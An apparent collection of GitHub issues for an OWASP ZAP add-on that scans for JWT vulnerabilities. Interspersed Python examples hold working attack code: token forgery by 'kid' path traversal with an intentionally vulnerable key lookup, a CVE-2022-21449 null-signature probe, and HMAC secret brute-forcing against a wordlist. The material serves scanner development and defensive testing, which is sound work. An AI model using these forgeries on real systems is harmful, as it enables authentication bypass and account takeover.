sasanlabs / owasp-zap-jwt-addon
OWASP ZAP addon for finding vulnerabilities in JWT Implementations
Home Page: https://www.zaproxy.org/
License: Apache License 2.0
Is your feature request related to a problem? Please describe.
It would be great if the JWT add-on could check for JWT issues related to CVE-2022-21449.
Describe the solution you'd like
Implement a scan rule/check that can detect something similar to:
https://twitter.com/christophetd/status/1516878071785467904
Sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449)
Describe alternatives you've considered
N/A
Would you like to help fix this issue?
Not at this time.
Additional context
Nothing further.
https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/sharedutils -> implementation("org.zaproxy.addon:commonlib:1.0.0")
Describe the bug
Currently this rule tests static files (CSS, JS), which leads to false positives.
Expected behavior
Skip the test on static files
Would you like to help fix this issue?
Yes
To Reproduce
Steps to reproduce the behavior:
Is your feature request related to a problem? Please describe.
The scan rules present at https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks do not have the header param injections mentioned at https://portswigger.net/web-security/jwt. There are a few other attacks which may not be present in AttackVectors.
Describe the solution you'd like
Add the attack vectors for the leftover injections as described at https://portswigger.net/web-security/jwt
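Added example, not part of the issue above or of the add-on's code: one of the PortSwigger header injections, `kid` path traversal, shown end to end. The server side is a constructed stand-in (a key directory looked up by `kid`) with a deliberately vulnerable lookup next to a hardened one; the attacker side points `kid` at /dev/null and signs with the empty key the server will read. A POSIX host is assumed; all key material and tokens are constructed in the script.

```python
import base64
import hashlib
import hmac
import json
import os
import tempfile


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def sign_hs256(header: dict, claims: dict, secret: bytes) -> str:
    """Build a compact JWS (header must say HS256) signed with `secret`."""
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token: str, secret: bytes) -> bool:
    head, body, sig = token.split(".")
    expected = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(b64url(expected), sig)


def header_of(token: str) -> dict:
    head = token.split(".")[0]
    return json.loads(base64.urlsafe_b64decode(head + "=" * (-len(head) % 4)))


# --- simulated server side: HMAC keys stored as files under key_dir, selected by kid ---

def vulnerable_lookup(key_dir: str, kid: str) -> bytes:
    # Deliberately vulnerable: kid goes straight into the path, so "../../dev/null"
    # escapes key_dir and returns an empty key, which the attacker can sign with.
    with open(os.path.join(key_dir, kid), "rb") as f:
        return f.read()


def hardened_lookup(key_dir: str, kid: str) -> bytes:
    # Treat kid as an opaque identifier: restrict its character set and confirm the
    # resolved path is still directly inside key_dir.
    if not kid.isalnum():
        raise ValueError("invalid kid")
    path = os.path.realpath(os.path.join(key_dir, kid))
    if os.path.dirname(path) != os.path.realpath(key_dir):
        raise ValueError("kid escapes key directory")
    with open(path, "rb") as f:
        return f.read()


def server_accepts(lookup, key_dir: str, token: str) -> bool:
    try:
        key = lookup(key_dir, header_of(token)["kid"])
    except (OSError, ValueError, KeyError):
        return False
    return verify_hs256(token, key)


# --- attacker side: the kid path-traversal payload ---

def forge_with_kid_traversal(claims: dict, key_dir: str) -> str:
    """Point kid at /dev/null and sign with the empty key the server will read.
    A scanner would try several depths; here the depth is derived from key_dir,
    with two spare '..' components since '..' at the filesystem root is harmless."""
    depth = len([p for p in os.path.realpath(key_dir).split(os.sep) if p]) + 2
    kid = "../" * depth + "dev/null"
    return sign_hs256({"alg": "HS256", "typ": "JWT", "kid": kid}, claims, b"")


def demo() -> dict:
    """Constructed scenario: one real key file 'prod1', a legitimate token and a forged
    one, each checked against the vulnerable and the hardened lookup."""
    key_dir = tempfile.mkdtemp()
    real_secret = os.urandom(32)
    with open(os.path.join(key_dir, "prod1"), "wb") as f:
        f.write(real_secret)
    legit = sign_hs256({"alg": "HS256", "typ": "JWT", "kid": "prod1"}, {"sub": "alice"}, real_secret)
    forged = forge_with_kid_traversal({"sub": "admin"}, key_dir)
    return {
        "legit_vulnerable": server_accepts(vulnerable_lookup, key_dir, legit),
        "forged_vulnerable": server_accepts(vulnerable_lookup, key_dir, forged),
        "legit_hardened": server_accepts(hardened_lookup, key_dir, legit),
        "forged_hardened": server_accepts(hardened_lookup, key_dir, forged),
    }


if __name__ == "__main__":
    print(demo())
```

A scan rule does not know the key directory depth, so in practice it sends a short list of payloads (`../../dev/null`, `../../../dev/null`, and so on) each signed with the empty key, and raises an alert when any of them is accepted; the same signing routine covers the `kid` SQL-injection variant by swapping the payload string.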
Describe the bug
As the options panel for the JWT addon is complex, we should add the help index for the addon so that users can see the help right there and don't need to go to the readme.md in the repository to understand the options panel.
Sample code changes
Help Index: https://github.com/SasanLabs/owasp-zap-fileupload-addon/tree/main/src/main/javahelp/org/sasanlabs/fileupload/resources/help
In https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/ui/JWTOptionsPanel.java implement a method:
@Override
public String getHelpIndex() {
return <name>;
}
Sample PR: https://github.com/SasanLabs/owasp-zap-fileupload-addon/pull/6/files
Glimpse of UI where the help will be shown
Testing the changes
build the addon by running
This addon should contain the ability to encode/decode JWT tokens found in the request, so that JWT tokens can be tested on the fly.
I'm new to ZAP and I'm having a problem understanding this plug-in.
Therefore, it would be nice if I knew the getting started tutorial instead of trying to understand the configuration.
I would love to create the tutorial if it could be included here.
Is your feature request related to a problem? Please describe.
Analyse the brute force attack with common passwords for jwt as per the following https://raw.githubusercontent.com/wallarm/jwt-secrets/master/jwt.secrets.list list.
Read more on https://lab.wallarm.com/meet-jwt-heartbreaker-a-burp-extension-that-finds-thousands-weak-secrets-automatically/
Is your feature request related to a problem? Please describe.
As JWTs should not be very long-lived because of the revocation issue, an alert of low priority can be raised if such a case is found.
Need to analyse more on this and check if any other such validations are needed.
Is your feature request related to a problem? Please describe.
Currently I forget to check in/update the changelog file and merge the PR, which is not right. So we can integrate an action which will fail a PR if the changelog.md file is not modified.
https://github.com/marketplace/actions/changelog-checker is one GitHub action I found, and I think we can give it a try.
If this checker has some issues then we can write some common function to do the same, as this is a generic problem and might be faced by many.
Related to: zaproxy/zaproxy#6049
https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/JWTActiveScanner.java should be renamed JWTActiveScanRule
or JwtActiveScanRule
Of course you don't have to conform to that since this project is 3rd party, so close/address as you see fit. But it's a pretty simple change and helps bring consistency and clarity/specificity.
Is your feature request related to a problem? Please describe.
The JWT option in the fuzzer is not shown if the request doesn't contain a JWT pattern. There is no indication to the user why the JWT option is unavailable.
If JWT pattern was found in the request then:
To Reproduce
Go to any request which does not have a JWT pattern and then visit the fuzzer screen.
Expected behavior
Add the behavior details that the fuzzer will only show the JWT option if the request has a valid JWT format to Readme.md and also to the help index (we are building this in PR: #25)
Is your feature request related to a problem? Please describe.
Currently, we only handle JWTs signed using HMAC or RSA, but we have not handled JWTs signed with Elliptic Curve algorithms (ES384 etc.).
Describe the solution you'd like
Testing the changes, in case some implementation/poc is required
build the addon by running
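Added example serving both the Elliptic Curve request above and the CVE-2022-21449 request earlier on this page; it is not the add-on's code. It shows what an ES256/ES384/ES512 JWS signature looks like on the wire (raw r || s, RFC 7518 section 3.4), the r and s range check that the affected Java releases (15 through 18 before the April 2022 update) did not perform, the DER form a Java JOSE library hands to java.security.Signature, and a probe token with r = s = 0 that a scan rule can send: a server that accepts it is affected by the CVE or otherwise does not validate ECDSA signatures. The sample token is constructed here with a placeholder RS256 signature; no real keys are involved.

```python
import base64
import json
from typing import Optional, Tuple

# alg -> (coordinate size in bytes, curve order n). A JWS ES* signature is the raw
# concatenation r || s with each value left-padded to the coordinate size (RFC 7518 3.4).
EC_ALGS = {
    "ES256": (32, int("FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551", 16)),
    "ES384": (48, int("F" * 48 + "C7634D81F4372DDF581A0DB248B0A77AECEC196ACCC52973", 16)),
    "ES512": (66, int("01" + "F" * 65 + "A51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409", 16)),
}


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def split_jws(token: str) -> Tuple[dict, str, bytes]:
    head, body, sig = token.split(".")
    return json.loads(b64url_decode(head)), f"{head}.{body}", b64url_decode(sig)


def parse_ec_signature(alg: str, sig: bytes) -> Tuple[int, int]:
    """Split a raw JWS ECDSA signature into (r, s); wrong lengths (e.g. DER input) are rejected."""
    size, _ = EC_ALGS[alg]
    if len(sig) != 2 * size:
        raise ValueError(f"{alg} signature must be {2 * size} bytes, got {len(sig)}")
    return int.from_bytes(sig[:size], "big"), int.from_bytes(sig[size:], "big")


def signature_in_range(alg: str, r: int, s: int) -> bool:
    """The check the vulnerable Java versions skipped: r and s must both lie in [1, n-1]."""
    _, n = EC_ALGS[alg]
    return 1 <= r <= n - 1 and 1 <= s <= n - 1


def der_len(n: int) -> bytes:
    if n < 128:
        return bytes([n])
    assert n < 256  # long form with one length byte is enough for P-521 signatures
    return b"\x81" + bytes([n])


def raw_to_der(r: int, s: int) -> bytes:
    """DER SEQUENCE { INTEGER r, INTEGER s }, the form Java JOSE libraries pass to
    java.security.Signature. For r = s = 0 this is 3006020100020100: syntactically valid
    DER, which is why the missing range check alone was enough to bypass verification."""
    def der_int(v: int) -> bytes:
        body = v.to_bytes((v.bit_length() + 8) // 8, "big")  # spare byte keeps the sign bit clear
        return b"\x02" + der_len(len(body)) + body
    content = der_int(r) + der_int(s)
    return b"\x30" + der_len(len(content)) + content


def null_signature_probe(token: str, alg: Optional[str] = None) -> str:
    """Rewrite the token with an ES* alg and an all-zero signature (r = s = 0); claims are
    kept as they are. Keeps the token's own ES* alg when it has one, else uses ES256."""
    header, _, _ = split_jws(token)
    if alg is None:
        alg = header.get("alg") if header.get("alg") in EC_ALGS else "ES256"
    header["alg"] = alg
    body = token.split(".")[1]
    new_head = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    size, _ = EC_ALGS[alg]
    return f"{new_head}.{body}.{b64url_encode(bytes(2 * size))}"


def analyse(token: str) -> dict:
    """Report the ECDSA view of a token: (r, s), the range check and the DER encoding."""
    header, _, sig = split_jws(token)
    alg = header.get("alg")
    if alg not in EC_ALGS:
        return {"alg": alg, "ecdsa": False}
    r, s = parse_ec_signature(alg, sig)
    return {"alg": alg, "ecdsa": True, "r": r, "s": s,
            "in_range": signature_in_range(alg, r, s), "der_hex": raw_to_der(r, s).hex()}


def _constructed_token() -> str:
    # Constructed sample: RS256 header, fixed claims, 256 zero bytes standing in for a signature.
    head = b64url_encode(b'{"alg":"RS256","typ":"JWT"}')
    body = b64url_encode(b'{"sub":"1234567890","name":"alice","admin":false}')
    return f"{head}.{body}.{b64url_encode(bytes(256))}"


SAMPLE_TOKEN = _constructed_token()

if __name__ == "__main__":
    probe = null_signature_probe(SAMPLE_TOKEN)
    print(probe)
    print(analyse(probe))
```

When adding the probe as a scan rule, send one variant per ES* algorithm (64, 96 and 132 zero bytes respectively), since the server's key type decides which alg it will even attempt to verify; a patched JDK and any library that applies `signature_in_range` reject all three before touching the curve arithmetic.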
Is your feature request related to a problem? Please describe.
As the addon was made a year ago, many new vulnerabilities related to JWT might have been introduced since. So we would like to analyse the new attack vectors and how we can incorporate them in the addon.
Describe the solution you'd like
Look at the new blogs, bug bounties and other scan rules/add-ons/scanners to find out what we are missing and how we can incorporate them.
Code References
Attack vectors: https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks
JWT configuration
Go through readme for more information regarding the configuration.
Testing the changes, in case some implementation/poc is required
build the addon by running
Is your feature request related to a problem? Please describe.
As scanners cannot add all types of payloads to their execution, in case the user wants custom/additional payloads to be included as part of the scanner, we have custom payloads for such a requirement.
This is specifically useful for the case where, say, a key is stolen or only allowed for test environments but due to some bug it is used to sign the production JWTs; then this can help the organization validate in pen-tests etc.
This was suggested by @kingthorin . for more information visit: #11 (comment)
Describe the solution you'd like
Add support for custom payloads where users can add the HMAC keys or other keys which are well known and check if their implementation is vulnerable to those payloads.
Code Reference
PR where custom payloads are added: https://github.com/pulls?q=is%3Apr+author%3Akingthorin+archived%3Afalse+custom+payloads+is%3Aclosed
Code where custom payloads/keys can be used in JWT addon: https://github.com/SasanLabs/owasp-zap-jwt-addon/blob/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks/SignatureAttack.java#L96
We might need to enhance it in case we want to add the RSA-based keys.
Testing the changes
build the addon by running
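Added example serving both the custom-payload request above and the earlier brute-force request (the wallarm jwt.secrets.list); it is not the add-on's code. The same routine handles both: take an HS256/HS384/HS512 token and a list of candidate keys (a wordlist, or keys the user supplies because they are known to be leaked or test-only), recompute the HMAC for each and report the first match. The wordlist contents and the "custom" keys below are constructed for the demo, not the real list.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, List, Optional

HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def recover_hmac_secret(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate key that reproduces the token's signature, else None.
    The header's alg is taken at face value: we are the attacker, verifying offline, so
    nothing here is exposed to alg confusion. Non-HMAC tokens are skipped."""
    head, body, sig = token.split(".")
    alg = json.loads(_b64url_decode(head)).get("alg")
    if alg not in HMAC_ALGS:
        return None
    signing_input = f"{head}.{body}".encode()
    target = _b64url_decode(sig)
    for key in candidates:
        if hmac.compare_digest(hmac.new(key, signing_input, HMAC_ALGS[alg]).digest(), target):
            return key
    return None


def load_wordlist(text: str) -> List[bytes]:
    """Parse a newline-separated wordlist such as jwt.secrets.list; blank lines are dropped
    and each entry is used byte-for-byte (no trimming, since trailing spaces are valid keys)."""
    return [line.encode() for line in text.split("\n") if line]


def make_hs_token(alg: str, claims: dict, key: bytes) -> str:
    """Helper used only to construct sample tokens for the demo."""
    head = _b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), HMAC_ALGS[alg]).digest()
    return f"{head}.{body}.{_b64url_encode(sig)}"


# Constructed inputs: a few wordlist-style entries and two "custom payload" keys that stand in
# for keys an organisation knows to be test-only or leaked.
SAMPLE_WORDLIST = "secret\npassword\nchangeme\nqwertyuiop\n\n1234567890\n"
CUSTOM_KEYS = [b"test-env-signing-key", b"staging-hmac-key"]


def demo():
    weak = make_hs_token("HS256", {"sub": "alice"}, b"changeme")
    leaked = make_hs_token("HS512", {"sub": "bob"}, b"staging-hmac-key")
    strong = make_hs_token("HS256", {"sub": "carol"}, bytes(range(32)))
    return (
        recover_hmac_secret(weak, load_wordlist(SAMPLE_WORDLIST)),
        recover_hmac_secret(leaked, CUSTOM_KEYS),
        recover_hmac_secret(strong, load_wordlist(SAMPLE_WORDLIST) + CUSTOM_KEYS),
    )


if __name__ == "__main__":
    print(demo())
```

The check is entirely offline, so a scan rule can run it against every captured token without sending a single extra request; a recovered key is then confirmed the usual way, by signing a modified claim set with it and watching the server accept it. RSA-based custom keys, mentioned in the issue, need a different path (a signing key rather than a shared secret) and are not covered here.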
This issue is to track the inconsistency between truststore input and private key input.
Truststore takes input in PKCS12 format and the private key input is a PEM file.
Truststore input requires a password, whereas private key input does.
In case users are facing trouble with this, please add a comment or a thumbs up so that we can prioritise this issue.
thanks,
Karan
Is your feature request related to a problem? Please describe.
We currently only handle JWS but have not handled JWE, so under this enhancement we are looking to add:
Code References
Attack vectors: https://github.com/SasanLabs/owasp-zap-jwt-addon/tree/master/src/main/java/org/zaproxy/zap/extension/jwt/attacks
Adding Support for parsing JWE:
Testing the changes
build the addon by running
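Added example serving the JWE parsing request above and the earlier long-lived-token request; it is not the add-on's code. It classifies a compact serialization as JWS (three segments) or JWE (five segments, header carrying `enc`), exposes the header and, for JWS, the claims, and runs the lifetime check on those claims: no `exp` at all, or an `exp` far beyond `iat`/`nbf`, each produce a finding. A JWE payload is ciphertext, so only its header can be inspected. The 24-hour threshold and the `looks_like_jwt` detector are assumptions; the sample tokens are constructed with placeholder signature and ciphertext bytes.

```python
import base64
import json
import re
import time
from dataclasses import dataclass
from typing import Dict, List, Optional

SEGMENT = re.compile(r"[A-Za-z0-9_-]*")
MAX_LIFETIME_SECONDS = 24 * 3600  # assumed threshold for the "long-lived token" alert


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def looks_like_jwt(s: str) -> bool:
    """Detector a fuzzer or scanner can apply to a request value: 3 (JWS) or 5 (JWE)
    base64url segments whose first segment decodes to a JSON object with an alg member."""
    parts = s.split(".")
    if len(parts) not in (3, 5) or not parts[0]:
        return False
    if not all(SEGMENT.fullmatch(p) for p in parts):
        return False
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError:  # bad base64 (binascii.Error) and bad JSON/UTF-8 are both ValueErrors
        return False
    return isinstance(header, dict) and "alg" in header


@dataclass
class ParsedToken:
    kind: str                      # "JWS" or "JWE"
    header: Dict
    claims: Optional[Dict] = None  # JWS only; a JWE payload is ciphertext
    parts: Optional[Dict] = None   # raw decoded segments by name


def parse_compact(token: str) -> ParsedToken:
    parts = token.split(".")
    header = json.loads(b64url_decode(parts[0]))
    if len(parts) == 3:
        payload = b64url_decode(parts[1])
        try:
            claims = json.loads(payload)
        except ValueError:
            claims = None  # non-JSON payload (e.g. a nested token); nothing to check
        return ParsedToken("JWS", header, claims, {"signature": b64url_decode(parts[2])})
    if len(parts) == 5:
        if "enc" not in header:
            raise ValueError("five segments but no enc header: not a JWE")
        names = ("encrypted_key", "iv", "ciphertext", "tag")
        return ParsedToken("JWE", header, None, {n: b64url_decode(p) for n, p in zip(names, parts[1:])})
    raise ValueError(f"unexpected segment count {len(parts)}")


def lifetime_findings(claims: Dict, now: Optional[int] = None) -> List[str]:
    """Low-severity findings about token lifetime. Lifetime is measured from iat, falling
    back to nbf and then to the current time when neither is present."""
    now = int(time.time()) if now is None else now
    exp = claims.get("exp")
    if exp is None:
        return ["no exp claim: token never expires"]
    if not isinstance(exp, (int, float)) or isinstance(exp, bool):
        return ["exp is not a NumericDate"]
    findings = []
    start = claims.get("iat", claims.get("nbf", now))
    lifetime = exp - start
    if lifetime > MAX_LIFETIME_SECONDS:
        findings.append(f"long-lived token: {int(lifetime)} s between iat/nbf and exp")
    if exp < now:
        findings.append("token already expired")  # not a weakness, but useful scanner context
    return findings


def analyse(token: str, now: Optional[int] = None) -> Dict:
    parsed = parse_compact(token)
    findings: List[str] = []
    if parsed.kind == "JWE":
        findings.append("JWE: payload is encrypted; only header fields (alg/enc) can be inspected")
    elif parsed.claims is not None:
        findings.extend(lifetime_findings(parsed.claims, now))
    return {"kind": parsed.kind, "alg": parsed.header.get("alg"), "enc": parsed.header.get("enc"),
            "claims": parsed.claims, "findings": findings}


def _jws(claims: Dict) -> str:
    # Constructed sample JWS; the 32 zero bytes are a placeholder, not a real HMAC.
    head = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    return f"{head}.{b64url_encode(json.dumps(claims).encode())}.{b64url_encode(bytes(32))}"


LONG_LIVED = _jws({"sub": "alice", "iat": 1700000000, "exp": 1700000000 + 30 * 86400})
SHORT_LIVED = _jws({"sub": "alice", "iat": 1700000000, "exp": 1700000000 + 900})
NO_EXP = _jws({"sub": "alice", "iat": 1700000000})
# Constructed JWE: real-looking header, placeholder segments (not an actual ciphertext).
JWE_SAMPLE = ".".join([
    b64url_encode(b'{"alg":"RSA-OAEP-256","enc":"A256GCM"}'),
    b64url_encode(bytes(256)), b64url_encode(bytes(12)), b64url_encode(b"\x01" * 40), b64url_encode(bytes(16)),
])

if __name__ == "__main__":
    for t in (LONG_LIVED, SHORT_LIVED, NO_EXP, JWE_SAMPLE):
        print(analyse(t, now=1700000100))
```

`parse_compact` is the piece the JWE enhancement needs first: once the add-on can tell a JWE apart from a JWS, header-level checks (weak `alg`/`enc` combinations, key-management algorithms the deployment should not accept) can be written against `parsed.header` without any decryption, while the existing signature attacks stay restricted to the JWS branch.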